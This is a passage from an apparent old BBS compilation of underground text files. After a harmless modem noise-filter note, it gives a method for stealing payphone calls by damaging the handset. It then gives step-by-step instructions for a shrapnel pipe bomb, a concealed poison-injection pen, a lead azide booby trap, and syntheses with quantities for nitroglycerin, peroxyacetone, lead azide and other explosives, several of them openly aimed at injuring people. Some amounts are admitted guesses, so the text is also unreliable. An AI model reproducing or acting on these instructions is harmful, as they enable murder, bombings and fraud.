  3593. shaft the other way until it stops and try again. If you don't notice much
  3594. difference when you plug the Noise Killer in, that may be a good sign. Type in
  3595. a few commands and look for garbage characters on the screen. If there still
  3596. is, turn the shaft slowly until most of it is gone. If nothing seems to happen
  3597. at all, turn the shaft slowly from one side to the other. You should get plenty
  3598. of garbage or disconnected at some point. If you don't, reread this message to
  3599. make sure you've connected it right.
  3600.  
  3601.  
  3602. ***END OF ORIGNAL FILE***
  3603.  
  3604. ADDITION TO ORIGNAL FILE - 2/29/88 - Mike McCauley - CIS 71505,1173
  3605.  
  3606. First, a personal recomendation. _THIS WORKS!!!_  I have been plagued with
  3607. noise at 2400 for some time. I went round and round with Ma Bell on it, and
  3608. after they sent out several "repair persons" who were, to be kind, of limited
  3609. help in the matter, I threw in the towel. I saw this file on a board up east
  3610. a few days ago, and thought I'd bite. Threw the gismo together in about 10
  3611. minutes, took another five to adjust the pot for best results on my worst
  3612. conection, and guess what? No more worst connecion! A few pointers:
  3613.  
  3614. 1) The pot need not be either 5K or audio taper. I used a 10K 15 turn trim pot.
  3615.    Suggest you use what is handy.
  3616. 2) I used 2MFD's of capacitance (two 1MFD's in parallel) Two R.S. p/n 272-1055
  3617.    work fine. Remember that about 90 Volts will appear across red & green at
  3618.    ring, so the caps should be rated at 100VDC+.
  3619. 3) I ended up with a final series resistance value (100 ohm + pot) of 2.75K.
  3620.    I speculate that one could probably use 2MFD and a fixed 2.7K resistor and
  3621.    do the job 90% of the time. The adjustment of the pot is not very critical.
  3622.    Changes of +/- 1K made little difference in the performance of the circuit.
  3623.  
  3624. Hope it works as well for you as it did for me.
  3625.  
  3626. Mike McCauley
  3627.  
  3628.  
  3629.    ∩ 7   Å3                     
  3630. è             How to "steal" local calls from most Payphones
  3631.  
  3632.      Now to make free local calls, you need a  finishing nail.  We highly
  3633. recommend "6D E.G. FINISH C/H, 2 INCH" nails.  These are about 3/32 of an
  3634. inch  in diameter and 2 inches long (of course).  You also need  a  large
  3635. size  paper  clip.  By  large  we  mean they  are  about  2  inches  long
  3636. (FOLDED).  Then  you  unfold the paper clip.  Unfold it  by  taking  each
  3637. piece  and  moving  it out 90 degrees.  When it is done  it  should  look
  3638. somewhat like this:
  3639.                              /----------\
  3640.                              :          :
  3641.                              :          :
  3642.                              :          :
  3643.                              :          :
  3644.                              \-----
  3645.  
  3646.      Now,  on to the neat stuff.  What you do,  instead of unscrewing the
  3647. glued-on  mouthpiece,  is  insert the nail into the center  hole  of  the
  3648. mouthpiece  (where you talk) and push it in with pressure or just  hammer
  3649. it in by hitting the nail on something.  Just DON'T KILL THE  MOUTHPIECE!
  3650. You  could  damage  it if you insert the nail too far or  at  some  weird
  3651. angle.  If  this happens then the other party won't be able to hear  what
  3652. you say.
  3653.      You now have a hole in the mouthpiece in which you can easily insert
  3654. the  paper clip.  So, take out the nail and put in the paper  clip.  Then
  3655. take  the other end of the paper clip and shove it under the rubber  cord
  3656. protector at the bottom of the handset (you know, the blue guy...).  This
  3657. should end up looking remotely like...like this:
  3658.  
  3659.                              /----------\      Mouthpiece
  3660.                              :          :      /
  3661.              Paper clip -->  :          :     /
  3662.                              :      /---:---\
  3663.                              :      :   :   :------------>
  3664.          ====================\---))):       :  To earpiece ->
  3665.                    ^              ^ \-------------------->
  3666.                    :              :
  3667.                    :              :
  3668.                  Cord          Blue guy
  3669.  
  3670. (The  paper clip is shoved under the blue guy to make a  good  connection
  3671. between the inside of the mouthpiece and the metal cord.)
  3672.  
  3673.      Now,  dial  the number of a local number you wish to  call,  sayyyy,
  3674. MCI.  If  everything  goes okay, it should ring and not answer  with  the
  3675. "The Call You Have Made Requires a 20 Cent Deposit" recording.  After the
  3676. other  end  answers  the phone, remove the  paper  clip.  It's  all  that
  3677. simple, see?
  3678.  
  3679.      There  are  a couple problems,  however.  One  is,  as  we mentioned
  3680. earlier, the mouthpiece not working after you punch it.  If this  happens
  3681. to you,  simply move on to the next payphone.  The one you are now on  is
  3682. lost.  Another problem is that the touch tones won't work when the  paper
  3683. clip is in the mouthpiece. There are two ways around this..
  3684.      A> Dial the first 6 numbers.  This should be done without the  paper   ∩ 7   Å3                  
  3685. èclip making the connection, i.e., one side should not be connected.  Then
  3686. connect  the paper clip,  hold down the last digit,  and slowly pull  the
  3687. paper clip out at the mouthpiece's end.
  3688.      B> Don't  use  the paper clip at all.  Keep the nail  in  after  you
  3689. punch it.  Dial the first 6 digits.  Before dialing the last digit, touch
  3690. the nail head to the plate on the main body of the phone,  the money safe
  3691. thingy..then press the last number.
  3692.  
  3693.      The  reason  that this method is sometimes called  clear  boxing  is
  3694. because  there is another type of phone which lets you actually make  the
  3695. call  and  listen  to  them say "Hello,  hello?"  but  it  cuts  off  the
  3696. mouthpiece  so  they can't hear you.  The Clear Box is used  on  that  to
  3697. amplify your voice signals and send it through the earpiece.  If you  see
  3698. how  this  is even slightly similar to the method we  just  described  up
  3699. there, kindly explain it to US!! Cause WE don't GET IT!
  3700.  
  3701.      Anyways,  this DOES work on almost all single slot,  Dial Tone First
  3702. payphones (Pacific Bell for sure).  We do it all the time.  This  is  the
  3703. least,  WE STRESS *LEAST*, risky form of Phreaking.  And remember.  There
  3704. are other Phreaks like you out there who have read this article and punch
  3705. payphones, so look before you punch, and save time.
  3706.  
  3707.  
  3708.  
  3709.  
  3710.  
  3711.                    - HOW TO MAKE A POWERFUL PIPE BOMB -
  3712.  
  3713.  
  3714.     This pipe bomb is extremely powerful and should be used with extreme
  3715. caution.  This bomb is very nice and EXTREMELY powerful, though.  It packs
  3716. quite a punch, especially nestled on someone's engine block.
  3717.  
  3718. Ingredients:
  3719.  
  3720.         1.  A PVC pipe.  The longer, the more powerful.  I recommend about 5
  3721.             inches.
  3722.  
  3723.         2.  Two ends, preferably brass.  These are the things that screw on to
  3724.             the end of the pipe.
  3725.  
  3726.         3.  Black powder - gun powder.
  3727.  
  3728.         4.  A drill.
  3729.  
  3730.         5.  Cannon Fuse, 6+ inches long.
  3731.  
  3732.       * 6.  Iron bits and pieces.
  3733.  
  3734. * denotes optional.
  3735.  
  3736. Instructions:
  3737.  
  3738.  Use the drill to make a hole in the middle of the PVC pipe, a hole as big as
  3739.  the width of the fuse.  Put one end on one end of the pipe, tighten it nicely  ∩7Å3 
  3740. è and then pour as much black powder in there as will fit.  Now securely fasten
  3741.  the other end on the other side and insert the fuse.  Place, light, and run!
  3742.  
  3743. Options:
  3744.  
  3745.  Bury the bomb about six inches underground and light.  I once did this and it
  3746.  sent debris 20 feet in every direction.
  3747.  Place on the engine block of car to destroy it.
  3748.  Try electric detonation with an electric match.
  3749.  Put iron bits in the black powder to make it lethal.
  3750.  
  3751. Remember:
  3752.  
  3753.  If this is used correctly it can be as powerful as a hand grenade.  Also,
  3754.  light this in the correct place or else it could make your life miserable.
  3755.  
  3756.  
  3757.                                    Poison Pen
  3758.  
  3759. Need:    plastic retractable ball pt. pen
  3760.          1cc Tuberculin syringe (about .7cm diam. or 1/4in)
  3761.                                 (needle:1cm or 3/8 in.  long)
  3762.          razor blades
  3763.          ruler
  3764.  
  3765.  
  3766. To make:
  3767.          Cut about 1/4 in. or .7cm off end of syringe tube.  Generally make the
  3768. tube streamlined.  Take insides out of pen.  Sheer off tip of pen until you can
  3769. push the syringe in with light pressure and have all the needle, but nothing
  3770. else, protruding from the tip.  Cut a mark in the syringe where pen meets
  3771. syringe.  Remove syringe. Screw the sides of the pen together.  Cut pen in two
  3772. at meeting place of two halves.  Take the moving parts of the pen ( the
  3773. 'clicker') out.  Cut off all protrusions (parts that look like the fins on a
  3774. rocket) Glue all parts together like they were originally.  That part will now
  3775. be called the clicker.  Cut the 'push' flat part off the top of the plunger.
  3776. Cut the plunger so it is about 3/8 in. from the top of the tube when inserted
  3777. all the way.  Whittle the tip of the plunger so it will fit loosely in the
  3778. clicker.  Plunger end first, GENTLY push the tube into the clip-on end of the
  3779. pen as far as it will go, with moderate pressure.  Mark the place where pen
  3780. meets tube.  Remove the tube, measure the distance between the two marks, and
  3781. cut that much off the end of the tube.  Cut and whittle the plunger again.
  3782. Place the clicker in the clip end.  Insert the plunger to about .4cc and gently
  3783. push into the clip end. You should be able to push the clicker and make the
  3784. plunger move all the way down to empty. If not, modify further.  Cut a piece of
  3785. plastic or paper about 2cm or 7/8in wide, big enough to wrap around the biggest
  3786. part of the pen.  Tape it so it forms a sheath or tube and paint to match the
  3787. pen, like a sheath to cover the gap between the ends when the pen is not armed.
  3788.  
  3789.  
  3790. To Arm:
  3791.          Remove the syringe parts and fill with about .4cc liquid (good poison
  3792. of course).  Push the plunger end in the clip end as far as it will go. Some
  3793. liquid should squirt out, which is okay, as long as there is .1-.2cc left.
  3794. Take the other end of the pen and push it over the syringe and into the sheath.  ∩7Å3 
  3795. èYou should place it so the needle is almost extending out of the end, but not
  3796. quite.
  3797.  
  3798. To use:
  3799.          One-handed, holding with the clip on part (not touching the clicker),
  3800. slide the two ends together. The needle should slide out.  Stab, depress
  3801. clicker. The syringe should inject its poison.
  3802.  
  3803.  
  3804.                                   Chemicals 1
  3805.  
  3806. I. Common "weak" explosives.
  3807.  
  3808.  A. Gunpowder:
  3809.      75% Potassium Nitrate
  3810.      15% Charcoal
  3811.      10% Sulfur
  3812.  
  3813.       The chemicals should be ground into a fine powder (seperately!) with a
  3814. morter & pestle. If gunpowder is ignited in the open, it burns fiercely, but if
  3815. in a closed space it builds up pressure from the released gases and can explode
  3816. the container. Gunpowder works like this: the potassium nitrate oxidizes the
  3817. charcoal and sulfur, which then burn fiercely. Carbon dioxide and sulfur
  3818. dioxide are the gases released.
  3819.  
  3820.  B. Ammonal:
  3821.      Ammonal is a mixture of ammonium nitrate (a strong oxidizer) with aluminum
  3822. powder (the 'fuel' in this case). I am not sure of the % composition for
  3823. Ammonal, so you may want to experiment a little using small amounts.
  3824.  
  3825.  C. Chemically ignited explosives:
  3826.  
  3827.   1. A mixture of 1 part potassium chlorate to 3 parts table sugar (sucrose)
  3828. burns fiercely and brightly (similar to the burning of magnesium) when 1 drop
  3829. of concentrated sulfuric acid is placed on it. What occurs is this: when the
  3830. acid is added it reacts with the potassium chlorate to form chlorine dioxide,
  3831. which explodes on formation, burning the sugar as well.
  3832.   2. Using various chemicals, I have developed a mixture that works very well
  3833. for imitating volcanic eruptions. I have given it the name 'MPG Volcanite'
  3834. (tm). Here it is: potassium chlorate +potassium perchlorate + ammonium nitrate
  3835. + ammonium dichromate + potassium nitrate + sugar + sulfur + iron filings +
  3836. charcoal + zinc dust + some coloring agent. (scarlet= strontium nitrate,
  3837. purple= iodine crystals, yellow= sodium chloride, crimson= calcium chloride,
  3838. etc...).
  3839.   3. So, do you think water puts out fires? In this one, it starts it. Mixture:
  3840. ammonium nitrate + ammonium chloride + iodine + zinc dust. When a drop or two
  3841. of water is added, the ammonium nitrate forms nitric acid which reacts with the
  3842. zinc to produce hydrogen and heat. The heat vaporizes the iodine (giving off
  3843. purple smoke) and the ammonium chloride (becomes purple when mixed with iodine
  3844. vapor). It also may ignite the hydrogen and begin burning.
  3845.      Ammonium nitrate: 8 grams
  3846.      Ammonium choride: 1 gram
  3847.      Zinc dust: 8 grams
  3848.      Iodine crystals: 1 gram
  3849.   4. Potassium permanganate + glycerine when mixed produces a purple-colored  ∩7Å3 
  3850. èflame in 30 secs-1 min. Works best if the potassium permanganate is finely
  3851. ground.
  3852.   5. Calcium carbide + water releases acetylene gas (highly flammable gas used
  3853. in blow torches...)
  3854.  
  3855. II. Thermite reaction.
  3856.  
  3857.   The Thermite reaction is used in welding, because it generates molten iron
  3858. and temperatures of 3500 C (6000F+). It uses one of the previous reactions that
  3859. I talked about to START it!
  3860.  
  3861.   Starter=potassium chlorate + sugar
  3862.   Main pt.= iron (III) oxide + aluminum powder (325 mesh or finer)
  3863.  
  3864.     Put the potassium chlorare + sugar around and on top of the main pt. To
  3865. start the reaction, place one drop of concentrated sulfuric acid on top of the
  3866. starter mixture. STEP BACK! The ratios are: 3 parts iron(III) oxide to 1 part
  3867. aluminum powder to 1 part potassium chlorate to 1 part sugar.
  3868.  When you first do it, try 3g:1g:1g:1g!
  3869.  Also, there is an alternative starter for the Thermite reaction. The
  3870. alternative is potassium permanganate + glycerine. Amounts: 55g iron(III)
  3871. oxide, 15g aluminum powder, 25g potassium permanganate, 6ml glycerine.
  3872.  
  3873. III. Nitrogen-containing high explosives.
  3874.  
  3875.   A. Mercury(II) Fulminate
  3876.       To produce Mercury(II) Fulminate, a very sensitive shock explosive, one
  3877. might assume that it could be formed by adding Fulminic acid to mercury. This
  3878. is somewhat difficult since Fulminic acid is very unstable and cannot be
  3879. purchased. I did some research and figured out a way to make it without
  3880. fulminic acid. You add 2 parts nitric acid to 2 parts alcohol to 1 part
  3881. mercury. This is theoretical (I have not yet tried it) so please, if you try
  3882. this, do it in very* small amounts and tell me the results.
  3883.  
  3884.   B. Nitrogen Triiodide
  3885.       Nitrogen Triiodide is a very powerful and very shock sensitive explosive.
  3886. Never store it and be carful when you're around it- sound, air movements, and
  3887. other tiny things could set it off.
  3888.  
  3889. Materials-
  3890.    2-3g Iodine
  3891.    15ml conc. ammonia
  3892.    8 sheets filter paper
  3893.    50ml beaker
  3894.    feather mounted on a two meter pole
  3895.    ear plugs
  3896.    tape
  3897.    spatula
  3898.    stirring rod
  3899.  
  3900.   Add 2-3g Iodine to 15ml ammonia in the 50ml beaker. Stir, let stand for 5
  3901. minutes.
  3902. DO THE FOLLOWING WITHIN 5 MINUTES!
  3903.    Retain the solid, decant the liquid (pour off the liquid but keep the brown
  3904. solid...). Scape the brown residue of Nitrogen Triiodide onto a stack of four  ∩7Å3 
  3905. èsheets of filter paper. Divide solid into four parts, putting each on a
  3906. seperate sheet of dry filter paper. Tape in position, leave to dry undisturbed
  3907. for AT LEAST 30 minutes (preferrably longer). To detonate, touch with feather.
  3908. (WEAR EAR PLUGS WHEN DETONATING OR COVER EARS- IT IS VERY LOUD!)
  3909.  
  3910.   C. Cellulose Nitrate (Guncotton)
  3911.  
  3912.        Commonly known as Smokeless powder, Nitrocellulose is exactly that- it
  3913. does not give off smoke when it burns.
  3914.  
  3915. Materials-
  3916.   70ml concentrated sulfuric acid
  3917.   30ml concentrated nitric acid
  3918.   5g absorbent cotton
  3919.   250ml 1M sodium bicarbonate
  3920.   250ml beaker
  3921.   ice bath
  3922.   tongs
  3923.   paper towels
  3924.  
  3925.    Place 250ml beaker in the ice bath, add 70ml sulfuric acid, 30 ml nitric
  3926. acid. Divide cotton into .7g pieces. With tongs, immerse each piece in the acid
  3927. solution for 1 minute. Next, rinse each piece in 3 successive baths of 500ml
  3928. water. Use fresh water for each piece. Then immerse in 250ml 1M sodium
  3929. bicarbonate. If it bubbles, rinse in water once more until no bubbling occurs.
  3930. Squeeze dry and spread on paper towels to dry overnight.
  3931.  
  3932.  
  3933.   D. Nitroglycerine
  3934.  
  3935.     Nitroglycerine is a *VERY* dangerous shock sensitive explosive. It is used
  3936. in making dynamite, among other things.
  3937.     I am not sure as to the proportions and amounts of chemicals to be used, so
  3938. I shall use estimates.
  3939.  
  3940. Materials-
  3941.   70ml conc. sulfuric acid
  3942.   30ml conc. nitric acid
  3943.   10 ml glycerine
  3944.   ice bath
  3945.   150ml beaker
  3946.  
  3947.    Put the 150ml beaker in the ice bath and make sure that it is very cold.
  3948. Slowly add the 70ml sulfuric and 30ml nitric acids to the beaker, trying to
  3949. maintain a low temperature. When the temperature starts to level off, add about
  3950. 10ml glycerine. If it turns brown or looks funny, **RUN LIKE HELL**. When
  3951. Nitroglycerine turns brown, that means it's ready to explode... If it stays
  3952. clear and all works well, keep the temperature as low as you can and let it sit
  3953. for a few hours. You then should have some Nitroglycerine, probably mixed with
  3954. nitric and sulfuric acids. When you set it off, you must not be nearby.
  3955. Nitroglycerine can fill 10,000 times its original area with expanding gases.
  3956. This means that if you have 10ml's of Nitroglycerine in there, it will produce
  3957. some 100,000ml's of gases.
  3958.    To make it into dynamite, the Nitroglycerine must be absorbed into something
  3959. like wood pulp or diamaeceous earth (spelled something like that).  ∩7Å3 
  3960.  
  3961. IV. Other stuff
  3962.  
  3963.   A. Peroxyacetone
  3964.  
  3965.    Peroxyacetone is extremely flammable and has been reported to be shock
  3966. sensitive.
  3967.  
  3968. Materials-
  3969.   4ml Acetone
  3970.   4ml 30% Hydrogen Peroxide
  3971.   4 drops conc. hydrochloric acid
  3972.   150mm test tube
  3973.  
  3974.  Add 4ml acetone and 4ml hydrogen peroxide to the test tube. Then add 4 drops
  3975. concentrated hydrochloric acid. In 10-20 minutes a white solid should begin to
  3976. appear. If no change is observed, warm the test tube in a water bath at 40
  3977. celsius. Allow the reaction to continue for two hours. Swirl the slurry and
  3978. filter it. Leave out on filter paper to dry for at least two hours. To ignite,
  3979. light a candle tied to a meter stick and light it (while staying at least a
  3980. meter away).
  3981.  
  3982.   B. Smoke smoke smoke...
  3983.  
  3984.    The following reaction should produce a fair amount of smoke. Since this
  3985. reaction is not all that dangerous you can use larger amounts if necessary for
  3986. larger amounts of smoke.
  3987.  
  3988.    6g zinc powder
  3989.    1g sulfur powder
  3990.  
  3991.     Insert a red hot wire into the pile, step back. A lot of smoke should be
  3992. created.
  3993.  
  3994.  
  3995.  
  3996.                                 Pyrotechnics #2
  3997.  
  3998.  
  3999.       Touch Paper, Self Igniting Mixtures, Percussion Explosives
  4000.  
  4001.  
  4002. Sodium Azide - NaN
  4003.                   3
  4004. This white powder is very poisonous. It is also a bit unstable, so treat it
  4005. gently.
  4006.  
  4007. Lead Nitrate - Pb(NO )
  4008.                     3 2
  4009. This contains poisonous lead and is very water soluble so your body will
  4010. absorb it quickly, given the chance. The government has banned leaded paints
  4011. and is phasing out leaded gasoline because the stuff slowly accumulates in
  4012. your body and can screw up all sorts of important innards. If you are careless
  4013. with Lead Nitrate you can do a few lifetimes' worth of damage in one  ∩7Å3
  4014. èafternoon.
  4015.  
  4016. Ammonium Nitrate - NH NO
  4017.                      4  3
  4018. Commonly used as fertilizer, this stuff is somewhat dangerous in large
  4019. quantities, particularly if it gets very hot. (Entire shiploads of this
  4020. material have been known to go up all at once.) When heated gently, it
  4021. decomposes into water and nitrous oxide (laughing gas). Farmers sometimes use
  4022. it to blow up tree stumps by mixing it with fuel oil and setting the gunk off
  4023. with a detonator. We'll have a very different use for it here.
  4024.  
  4025. Potassium Nitrate - KNO
  4026.                        3
  4027. Also known as saltpeter, this is commercially used as a diuretic for animals.
  4028. It also works as an oxidizing agent in various pyrotechnic mixtures. That is,
  4029. when heated it provides the oxygen needed to make the rest of the mixture
  4030. burn.
  4031.  
  4032. Potassium   Potassium
  4033.  Nitrate     Nitrite   Oxygen
  4034.  
  4035.  2KNO   --->  2KNO    +  O
  4036.      3            2       2
  4037.  
  4038.  
  4039.  
  4040. Potassium Chlorate - KClO
  4041.                          3
  4042. A much more spectacular oxidizing agent than Potassium Nitrate. It not only
  4043. yields more oxygen than Potassium Nitrate, it does so more easily. Pyrotechnic
  4044. mixtures containing this chemical will require much less of it, and yet burn
  4045. more fiercely. Even percussion can readily set the mixtures off. This can be
  4046. useful, but it sometimes makes the mixtures more sensitive than you'd like.
  4047. Mixtures containing this chemical must be handled carefully. Potassium
  4048. Chlorate is also poisonous.
  4049.  
  4050. Potassium     Potassium
  4051.  Chlorate      Chloride   Oxygen
  4052.  
  4053.   2KClO   --->   2KCl   +   3O
  4054.        3                      2
  4055.  
  4056.  
  4057. Aluminum Dust
  4058.  
  4059. Very finely divided aluminum. When put in a glass jar, it almost looks like a
  4060. solid piece of grey metal. In this form it is flammable. Also, it can
  4061. seriously damage your lungs if you inhale it. Be careful not to stir up any
  4062. clouds of dust, and it goes without saying that you shouldn't use it near an
  4063. open flame.
  4064.  
  4065. Zinc Dust
  4066.  
  4067. Very finely divided zinc. Not quite as flammable as Aluminum Dust, but still
  4068. worth handling carefully. Can also damage your lungs if inhaled.  ∩7Å3 
  4069. ampblack
  4070.  
  4071. This is very finely divided carbon, usually obtained as a soot from other
  4072. manufacturing processes. It is much more effective in pyrotechnic mixtures
  4073. than powdered charcoal. Tiny spots of this are almost unnoticeable, but they
  4074. stick to your hands and smear incredibly far. If you're not very tidy you
  4075. should expect to find black smears all over your face and hands after using
  4076. this.
  4077.  
  4078. Sulfur
  4079.  
  4080. A yellow powder used as a reducing agent in many pyrotechnic mixtures. Buy
  4081. this in the finely powdered form. You can also get it in hard lumps, but these
  4082. will just waste extra time as you have to grind them yourself.
  4083.  
  4084. Potassium Permanganate
  4085.  
  4086. An oxidizing agent that's somewhat less vigorous than others mentioned here.
  4087. Not usually used in pyrotechnic mixtures because it's more expensive and less
  4088. effective than some of the alternatives. There are a few cases when it's just
  4089. the right thing. Don't let this accidentally come in contact with glycerine.
  4090. If such an accident happens, the resulting mess should be immediately wiped up
  4091. with wet paper towels and buried or flushed down a toilet. It should NOT be
  4092. thrown away in a dry waste receptacle!!!
  4093.  
  4094. Gum Arabic
  4095.  
  4096. A white powder which is mixed with water to make a glue like substance. Useful
  4097. for coating various mixtures or binding them together into a solid mass.
  4098.  
  4099. Sodium Peroxide
  4100.  
  4101. A very strange and dangerous oxidizer. Don't let it get wet and don't let it
  4102. touch your skin.
  4103.  
  4104. Glycerine
  4105.  
  4106. A thick liquid, chemically similar to rubbing alcohol. Though harder to get
  4107. burning, it will burn in the right circumstances. Fairly safe stuff.
  4108.  
  4109. Iodine Crystals
  4110.  
  4111. Pure Iodine is a steel grey solid, which is poisonous and which produses
  4112. poisonous vapors when heated. Smells similar to the chlorine used in bleaches
  4113. and swimming pools. If you accidentally should drop some on a hot surface and
  4114. notice the odor, you should leave the area.
  4115.  
  4116.  
  4117.  
  4118.                                 Touch Paper
  4119.  
  4120.   This is an easily made material that acts like a slow burning fuse and is
  4121. ideal for testing small amounts of a pyrotechnic mixture. It is made by
  4122. soaking a piece of absorbent paper, like a paper towel, in a saturated  ∩7Å3
  4123. èsolution of Potassium Nitrate. (A saturated solution means that you have
  4124. dissolved as much of the chemical in water as is possible.) Hang the paper up
  4125. to dry, and be sure to wipe up any drips. When dry it is ready. Cut off a
  4126. small strip and light the edge to see how different it acts from ordinary
  4127. paper. This will ignite all but the most stubborn mixtures, and will ignite
  4128. gunpowder, which will in turn ignite most anything else.
  4129.  
  4130.   Don't dip the towel in the Potassium Nitrate solution a second time to try to
  4131. make it "stronger". This will actually make it less effective. Some of the
  4132. fancier paper towels don't work too well for this. Best results are obtained
  4133. from the cheap folded paper towels found in public restrooms everywhere.
  4134.  
  4135.  
  4136.                            Self Igniting Mixtures
  4137.  
  4138.   Pulverize 1 gram of Potassium Permanganate crystals and place them on an
  4139. asbestos board or in an earthenware vessel. Let 2-3 drops of glycerine fall
  4140. onto the Potassium Permanganate. The mixture will eventually sizzle and then
  4141. flare. Potassium Permanganate is the oxidizing agent. The glycerine is
  4142. oxidized so quickly that heat is generated faster than it can be dissipated.
  4143. Consequently, the glycerine is ignited. Because this mixture takes so long to
  4144. catch on fire, it is sometimes useful when a time delay is needed to set off
  4145. some other mixture. If you lose patience with this test, DO NOT THROW THE
  4146. MIXTURE AWAY IN A WASTEBASKET!!! Either bury it or flush it down a toilet. I
  4147. know of at least one house fire that was started because this was not done.
  4148. Given time, this stuff WILL start to burn.
  4149.  
  4150.   This demonstration produces a very nice effect, but sends out a lot of
  4151. poisonous fumes, so do it outside. Make a mound of equal volumes of iodine
  4152. crystals and aluminum dust. Make a small indentation at the top of the mound
  4153. and add a drop or two of water and move away. It will hiss and burst into
  4154. flame, generating thick purple smoke. The fumes are Iodine vapor which is
  4155. very caustic, so make sure you are upwind of the fire. Since this is set off
  4156. by moisture, you should not store the mixed material. Mix it immediately
  4157. before you plan to use it.
  4158.  
  4159.   Shred a small piece of newspaper and place on it a small amount of sodium
  4160. peroxide. Add two drops of hot water. The paper will be ignited. CAUTION: Keep
  4161. Sodium Peroxide from moisture and out of contact with organic materials (your
  4162. skin, for example.)
  4163.  
  4164.   Ammonium Nitrate, 5 grams, 1 gram of Ammonium Chloride. Grind these
  4165. SEPARATELY, and add 1/4 gram of zinc dust. Form a cone and add 2-4 drops of
  4166. water. A bright blue flame with large volumes of smoke forms. Depending on the
  4167. quality of your zinc dust, you may need to increase the quantity of zinc.
  4168. Since this is ignited by moisture, you should not attempt to store this
  4169. mixture.
  4170.  
  4171.  
  4172.                            Percussion Explosives
  4173.  
  4174.   This section will not only introduce a couple of mixtures with interesting
  4175. possibilities, but it will also demonstrate how sensitive mixtures containing
  4176. Potassium Chlorate can be. Keep in mind that Chlorate mixtures can be a LOT
  4177. more sensitive than the ones shown here.  ∩7Å3 
  4178. è
  4179.  
  4180.   Mix 1 part by weight of Sulfur, and 3 parts Potassium Chlorate. Each should
  4181. be ground separately in a mortar. They should be mixed lightly without any
  4182. pressure on a sheet of paper. A small amount of this mixture (less than one
  4183. gram!!) placed on a hard surface and struck with a hammer will explode with a
  4184. loud report.
  4185.  
  4186.   Mix the following parts by weight, the same way as above,
  4187.  
  4188.                 Potassium Chlorate 6
  4189.                 Lampblack          4
  4190.                 Sulfur             1
  4191.  
  4192.   Both of these mixtures are flammable. Mix small quantities only.
  4193.  
  4194.  
  4195.  
  4196.                              Lead Azide  Pb(N )
  4197.                                              3 2
  4198.  
  4199.   Unlike many explosives that must be enclosed in a casing to explode, and
  4200. others that require a detonator to set them off, Lead Azide will explode in
  4201. open air, either due to heat or percussion. Mixed with gum arabic glue, tiny
  4202. dots of it are placed under match heads to make trick exploding matches. The
  4203. same mixture coated onto 1/2 " wood splinters are used to "load" cigars. In
  4204. larger amounts, it is used as a detonator. A moderately light tap will set it
  4205. off, making it much more sensitive than the percussion explosives already
  4206. mentioned. It is very easy to make.
  4207.  
  4208.   Take about 1.3 grams of sodium azide and dissolve it in water. It's best not
  4209. to use any more water than necessary. In a separate container, dissolve about
  4210. 3.3 grams of Lead Nitrate, again only using as much water as needed to get it
  4211. to dissolve. When the two clear liquids are mixed, a white precipitate of Lead
  4212. Azide will settle out of the mixture. Add the Lead Nitrate solution, while
  4213. stirring, until no more Lead  Azide precipitates out. You may not need to use
  4214. it all. Note that the above weights are given only for your convenience if you
  4215. have the necessary scales, and give the approximate proportions needed. You
  4216. need only continue to mix the solutions until no more precipitate forms.
  4217.  
  4218.   The precipitate is filtered out and rinsed several times with distilled
  4219. water.  It is a good idea to store this in its wet form, as it is less
  4220. sensitive this way. It's best not to store it if possible, but if you do, you
  4221. should keep it in a flexible plastic container that wont produce sharp
  4222. fragments in case of an explosion. (NO MORE THAN A GRAM AT A TIME !!!!) Also,
  4223. make sure that the mouth of the container is wiped CLEAN before putting the lid
  4224. on. Just the shock of removing the lid is enough to set off the dry powder if
  4225. it is wedged between the container and the stopper. Don't forget that after
  4226. you've removed the precipitate from the filter paper, there will still be
  4227. enough left to make the filter paper explosive.
  4228.  
  4229.   Lead Azide is very powerful as well as very sensitive. Never make more than a
  4230. couple of grams at one time.
  4231.  
  4232.             Reaction Equations  ∩7Å3 
  4233. è
  4234. Lead        Sodium        Lead     Sodium
  4235. Nitrate      Azide       Azide    Nitrate
  4236.  
  4237. Pb(NO )   +  2NaN   ---> Pb(N )  + 2NaNO
  4238.      3 2         3           3 2        3
  4239.  
  4240.   Don't try to salvage the Sodium Nitrate that's left over (dissolved in the
  4241. water). Sodium nitrate is cheap, not really useful for good pyrotechnics, and
  4242. this batch will be contaminated with poisonous lead. It's worthless stuff.
  4243. Dump it out.
  4244.  
  4245.   To demonstrate the power of a little bit of Lead Azide, cut out a piece of
  4246. touch paper in the following shape
  4247.  
  4248.  
  4249.  
  4250. -----------------------------
  4251. !                            !
  4252. !                            !
  4253. !                             ---------------
  4254. !                                            !
  4255. !                             ---------------
  4256. !                            !
  4257. !                            !
  4258. -----------------------------
  4259.  
  4260.   Where the size of the wide rectangle is no more than one inch x 1/2 inch, and
  4261. the length of the little fuse is at least 3/4 inch. Apply a thin layer of wet
  4262. Lead Azide to the large rectangle with a paint brush and let it dry
  4263. thoroughly. When done, set this tester out in the open, light the fuse at the
  4264. very tip and step back. If done properly, the tiny bit of white powder will
  4265. produce a fairly loud explosion.
  4266.  
  4267.  
  4268.                           A Lead Azide Booby Trap
  4269.  
  4270.   Get some string that's heavy enough so that it won't break when jerked hard.
  4271. A couple of feet is enough to test this out. You may want to use a longer piece
  4272. depending on what you plan to do with this. Fold a small "Z" shape in the
  4273. center of the string, as shown in figure 1. The middle section of the "Z"
  4274. should be about one inch long.
  4275.  
  4276.  
  4277. -------------------------------------.
  4278.                              .
  4279.                    .
  4280.            .
  4281.        --------------------------------------------------
  4282.  
  4283.                   Figure 1. Fold string into a small Z
  4284.  
  4285.   Next, twist the Z portion together as tightly as you can. Don't worry if it
  4286. unwinds a bit when you let go, but it should still stay twisted closely
  4287. together. If it doesn't, you will need a different kind of string. Figure 2  ∩7Å3 
  4288. ètries to show what this will look like.
  4289.  
  4290. -------------//////////////////-----------------
  4291.  
  4292.                   Figure 2. Twist the Z portion tightly
  4293.  
  4294.   Next, apply some wet Lead Azide to the twisted portion with a paint brush.
  4295. The Lead Azide should have a bit of Gum Arabic in it to make it sticky. Cut
  4296. out a piece of paper, two inches by 6 inches long, wrap it around the twisted
  4297. portion, and glue the end on so that it stays put. You should now have a two
  4298. inch narrow paper tube with a string sticking out each end, as shown in figure
  4299. 3.
  4300.  
  4301.           -------------------------
  4302.           !                       !
  4303. ----------!                       !-------------------
  4304.           !                       !
  4305.           -------------------------
  4306.  
  4307.                   Figure 3. The completed Booby Trap
  4308.  
  4309.   You should now set the booby trap aside for at least two weeks so that the
  4310. Lead Azide inside can dry completely. Don't try to speed up the process by
  4311. heating it. When the two ends of the string are jerked hard, the friction in
  4312. the wound up string will set off the Lead Azide. The booby trap can be
